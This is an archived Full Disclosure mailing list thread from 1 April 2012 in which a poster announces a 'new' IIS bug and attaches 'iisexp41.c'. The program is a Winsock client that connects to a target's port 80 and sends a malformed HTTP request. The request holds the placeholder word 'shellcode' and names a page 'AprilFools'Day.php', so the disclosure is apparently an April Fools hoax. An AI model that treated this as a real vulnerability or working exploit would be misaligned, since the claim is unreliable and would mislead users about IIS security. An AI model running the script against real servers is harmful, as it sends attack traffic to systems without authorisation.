Full Disclosure mailing list archives
FW: iis bug
From: yuange <yuange1975 () hotmail com>
Date: Sun, 1 Apr 2012 07:51:09 +0000
the exp file. /* iisexp41.c ver4.1 copy by @yuange1975 2012.4.1 假作真时真亦假。 http://weibo.com/yuange1975 http://twitter.com/yuange75 http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html */ #include <stdio.h> #include <stdlib.h>#include <winsock2.h> #include <windows.h> #include <mswsock.h> #include <wsnwlink.h> #include <ws2tcpip.h> #include <process.h> /* _beginthread, _endthread */ #include <errno.h> #include <io.h> #include <conio.h>#pragma comment(lib,"ws2_32") #pragma comment(lib,"Mswsock")char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n"; static unsigned int maybe_lookup_host(char* name) { unsigned long ulAddr = INADDR_NONE; /* Don't bother resolving raw IP addresses, naturally. */ ulAddr = inet_addr((char*)name); if ( ulAddr != INADDR_NONE && ulAddr != INADDR_ANY ) return (unsigned int)ulAddr; return 0; }int do_exp(char *hostname,unsigned int port) { SOCKET hScoket = INVALID_SOCKET; struct sockaddr_in sin; unsigned int addr=0; int write_res = 0; char * crash_buf=NULL; int crash_buflen=0; /* create SOCKET */ hScoket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0/*WSA_FLAG_OVERLAPPED*/); if (hScoket == INVALID_SOCKET) { printf_s("WSASocket function failed with error = %d\n", WSAGetLastError() ); return -1; } /* Resolved IP address */ addr = maybe_lookup_host(hostname); sin.sin_family = AF_INET; sin.sin_port = htons(port); memcpy(&sin.sin_addr,&addr,4); /* connect */ if ( connect(hScoket, (struct sockaddr*) &sin, sizeof(struct sockaddr_in) ) == SOCKET_ERROR) { if ( WSAEWOULDBLOCK != WSAGetLastError() ) { closesocket(hScoket); printf_s("connect function failed with error: %ld\n", WSAGetLastError()); return -1; } } printf("[*] connected to %s:%d\n",hostname,port); //build_crash_package(&crash_buf,&crash_buflen); crash_buf = AprilFoolsDay; crash_buflen = strlen(AprilFoolsDay); /* send data to remote target */ write_res = send( hScoket, crash_buf, crash_buflen, 0); printf("[*] send %d bytes\n",write_res); closesocket(hScoket); return 0; }int main(int argc, const char **argv) { int iResult; int count=0; char * target_ip = (char*)argv[1]; WSADATA wsaData; if ( !target_ip || argc < 2 ) { printf_s("usage: <target_ip>\n"); return 0; } /* Initialize Winsock */ iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); if (iResult != 0) { printf_s("WSAStartup failed: %d\n", iResult); return -1; } do_exp(target_ip,80); /* clean - win socket */ WSACleanup(); return 0; } From: yuange1975 () hotmail com To: full-disclosure () lists grok org uk Subject: iis bug Date: Sun, 1 Apr 2012 03:30:29 +0000 iis new bug: http://weibo.com/yuange1975 poc: char *AprilFoolsDay ="GET /AprilFools'Day.php HTTP/1.1\r\nHOST:http://weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";
Attachment:
iisexp41.c
Description:
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- FW: iis bug yuange (Apr 01)
- Re: iis bug yuange (Apr 01)